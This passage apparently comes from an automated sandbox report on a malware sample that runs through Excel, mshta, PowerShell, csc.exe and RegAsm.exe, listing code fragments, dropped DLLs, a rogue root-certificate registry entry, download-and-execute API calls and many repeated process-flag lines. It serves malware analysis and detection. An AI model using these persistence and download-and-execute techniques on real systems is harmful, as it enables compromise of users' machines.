                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00414060 push eax; ret 29_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00414060 push eax; ret 29_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00414039 push ecx; ret 29_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_004164EB push 0000006Ah; retf 29_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00416553 push 0000006Ah; retf 29_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00416555 push 0000006Ah; retf 29_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004470B7 push eax; retf 0046h31_2_004470B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457186 push ecx; ret 31_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0045E55D push esi; ret 31_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457AA8 push eax; ret 31_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434EB6 push ecx; ret 31_2_00434EC9

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00406EEB ShellExecuteW,URLDownloadToFileW,31_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
